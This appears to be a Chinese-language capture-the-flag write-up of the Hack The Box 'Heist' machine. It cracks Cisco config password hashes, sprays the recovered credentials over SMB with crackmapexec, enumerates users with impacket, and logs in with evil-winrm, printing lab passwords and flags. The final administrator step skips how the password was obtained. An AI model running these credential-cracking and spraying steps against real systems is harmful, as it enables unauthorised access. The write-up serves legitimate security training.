Heist 带来了我以前在 HTB 上从未见过的新概念,但仍保持简单的难度。我将从在网站上找到一个 Cisco 配置开始,其中包含一些用户名和密码哈希值。恢复密码后,我会发现一个可以获取 RPC 访问权限,我将使用它来查找更多用户名。这些用户名之一和原始密码之一用于在 Heist 上获得 WinRM 会话。从那里,我会注意到 Firefox 正在运行,并转储进程内存以找到原始网站的密码,这也是该框的管理员密码。
信息收集#
└─# nmap -sV 10.129.96.157
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 03:13 EST
Nmap scan report for 10.129.96.157
Host is up (0.39s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.35 seconds
获得了 80 445 端口,访问 80 看看。
此页面是一个登录页面,尝试了弱口令无果,发现了其中的以访客身份登录。
密码破解#
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
获得了一份思科的网络配置文件。
其中
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
这是两个账户的密码
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
这看起来像是安全密钥的凭证
CMD5 无法破解密码,我检索了关于思科的密码破解器,发现了一个在线破解的网页
网址如下:https://www.ifm.net.nz/cookbooks/passwordcracker.html
得到了用户 rout3r 密码 $uperP_@_ssword admin 密码 Q4) sJu\Y8qz*A3?d
那么还差一个安全密钥类的密码没有破解。
使用 jhon 识别密文自动破解
─# john 2.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 2.09% (ETA: 03:44:05) 0g/s 29115p/s 29115c/s 29115C/s jose1980..jornel
stealth1agent (?)
1g 0:00:01:25 DONE (2022-12-07 03:35) 0.01171g/s 41059p/s 41059c/s 41059C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
获得了另外一个密码,stealth1agent
那么我就现在有两个账号,三个密码
用户
rout3r
admin
密码
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent
445 端口横向#
有了这几个密码之后,刚好他端口也开的 445 直接crackmapexec 横向试试。
比较尴尬的是几个账户都没爆破出来,回头看了一下 Web,把刚开始访客账号 Hazard 也添加其中。
重新跑一遍试试看。
└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard
获得了一个 SMB 账号,Hazard 。
根据之前的经验,也有可能是 winRM 横向,回头扫一下 5985 端口。
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 04:00 EST
Nmap scan report for 10.129.96.157
Host is up (0.41s latency).
PORT STATE SERVICE
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds
尝试使用该密码去连接,发现连不上。
看看 SMB 共享
smbmap -H 10.10.10.149 -u hazard -p stealth1agent
─# smbmap -H 10.129.96.157 -u hazard -p stealth1agent
[+] IP: 10.129.96.157:445 Name: 10.129.96.157
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
发现可以连接 IPC,并且是只读权限。
SMB 枚举用户#
https://www.freebuf.com/sectool/175208.html
https://www.heikeblog.com/archives/661.html 这篇文章很详细的介绍了 impack 包的几个用法。
└─# python3 lookupsid.py hazard:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
获得了这些新的用户后,回过头来重新对刚开始的用户做补充,重新爆破一遍试试看。
└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt --continue-on-success
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
--continue-on-success 参数会让 crackmapexec 继续跑,而不是跑一个就停下来。
SupportDesk\Chase) sJu\Y8qz*A3?d 枚举出来一个新的用户。
winRM 链接#
┌──(root㉿kali)-[~/Desktop]
└─# evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents>
新的用户 chase, 能够链接。
获取 user flag#
Evil-WinRM* PS C:\Users\Chase\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> dir
Directory: C:\Users\Chase\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 12/9/2022 7:41 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Chase\desktop> type user.txt
d4a33ebeff5334ec5c96993941af64d8
*Evil-WinRM* PS C:\Users\Chase\desktop>
获取 root flag#
我发现当前电脑存在很多用户,但是我无法去读取别人的桌面,权限很低。
查看刚刚哪个 todo.txt
*Evil-WinRM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
他这里提示三个。
1. 不断检查问题列表。
2.修复路由器配置。
完毕:
1.访客用户的访问受限。
查看进程
*Evil-WinRM* PS C:\Users\Chase\desktop> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
468 18 1980 5272 368 0 csrss
290 13 2224 5104 472 1 csrss
357 15 3448 14572 2156 1 ctfmon
251 14 3920 13316 3916 0 dllhost
166 9 1880 9716 0.03 6616 1 dllhost
614 32 29164 57988 960 1 dwm
1498 58 23896 78852 5304 1 explorer
1090 68 128468 205616 5.72 6264 1 firefox
347 19 10144 38584 0.11 6444 1 firefox
355 25 16396 38876 0.06 6716 1 firefox
401 34 34604 92436 0.70 6840 1 firefox
378 28 22020 58668 0.70 7020 1 firefox
49 6 1792 4584 768 1 fontdrvhost
49 6 1492 3808 776 0 fontdrvhost
0 0 56 8 0 0 Idle
976 22 5800 14792 624 0 lsass
223 13 3072 10308 3220 0 msdtc
0 12 400 15056 88 0 Registry
275 14 3096 15000 5448 1 RuntimeBroker
145 9 1716 7524 5732 1 RuntimeBroker
303 16 5636 17024 5804 1 RuntimeBroker
663 32 19716 61648 5668 1 SearchUI
550 11 5192 9632 608 0 services
672 28 14788 51860 5576 1 ShellExperienceHost
440 17 4792 23976 5032 1 sihost
53 3 528 1100 268 0 smss
471 22 5812 16264 2460 0 spoolsv
201 12 1980 9592 332 0 svchost
150 9 1812 11648 700 0 svchost
85 5 928 3716 724 0 svchost
860 20 6944 22496 744 0 svchost
378 13 10684 14832 852 0 svchost
868 16 5288 11672 856 0 svchost
257 10 2016 7648 908 0 svchost
286 13 4148 11276 1020 0 svchost
140 7 1364 5620 1068 0 svchost
126 16 4016 7832 1188 0 svchost
184 9 1796 7440 1200 0 svchost
229 12 2628 11208 1216 0 svchost
430 9 2808 8828 1236 0 svchost
154 7 1256 5540 1264 0 svchost
231 9 2168 7512 1304 0 svchost
367 17 4904 13864 1380 0 svchost
172 10 1792 8012 1392 0 svchost
353 14 4380 11480 1440 0 svchost
163 9 3084 7628 1452 0 svchost
255 15 3520 8512 1484 0 svchost
305 11 1976 8740 1492 0 svchost
191 12 2144 11888 1624 0 svchost
320 10 2552 8328 1640 0 svchost
163 11 2868 7356 1716 0 svchost
161 8 1896 7052 1772 0 svchost
129 7 1564 6216 1784 0 svchost
409 32 8448 17000 1820 0 svchost
196 11 1976 8040 1880 0 svchost
239 11 2516 9604 1888 0 svchost
171 9 1532 7176 2120 0 svchost
332 18 14656 31224 2124 0 svchost
167 12 4032 10820 2504 0 svchost
181 22 2488 9796 2512 0 svchost
462 20 12112 26688 2524 0 svchost
261 13 2668 7892 2540 0 svchost
376 15 9708 19304 2564 0 svchost
133 9 1672 6484 2604 0 svchost
136 8 1560 6096 2632 0 svchost
126 7 1224 5264 2656 0 svchost
205 11 2288 8296 2676 0 svchost
233 14 4604 11740 2752 0 svchost
169 10 2204 13200 2816 0 svchost
209 12 1852 7416 2824 0 svchost
265 19 3208 12000 2864 0 svchost
464 17 3448 11820 3076 0 svchost
193 15 6076 10004 3144 0 svchost
382 23 3340 12184 3248 0 svchost
423 48 13668 22296 3256 0 svchost
211 11 2780 11836 4432 0 svchost
145 8 1680 7432 4640 0 svchost
187 12 2636 13236 4696 0 svchost
169 9 4792 12192 4868 0 svchost
300 15 12772 14740 4928 0 svchost
251 14 3188 13740 4940 0 svchost
228 12 3100 13560 5048 1 svchost
365 18 5720 27008 5080 1 svchost
122 7 1288 5520 6208 0 svchost
115 7 1328 5192 6404 0 svchost
264 14 3632 12648 6488 0 svchost
225 12 3624 10940 6572 0 svchost
321 20 10184 14620 6756 0 svchost
1891 0 192 136 4 0 System
211 20 3976 12372 2036 1 taskhostw
167 11 2788 10760 2720 0 VGAuthService
142 8 1696 6844 2692 0 vm3dservice
136 9 1820 7352 3056 1 vm3dservice
384 22 9616 22104 2708 0 vmtoolsd
236 18 5096 15288 5712 1 vmtoolsd
171 11 1500 6860 492 0 wininit
280 13 2816 12936 528 1 winlogon
344 16 8920 18660 3196 0 WmiPrvSE
812 27 52104 70388 1.78 4316 0 wsmprovhost
发现了进程都很正常,唯独一个 firefox 进程显得很突兀。按照搞渗透的思维,尝试解开浏览器配置试一下。。
└─# evil-winrm -i 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/9/2022 7:41 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
22479c36a38a8b34331942f57b066490
*Evil-WinRM* PS C:\Users\Administrator\Desktop>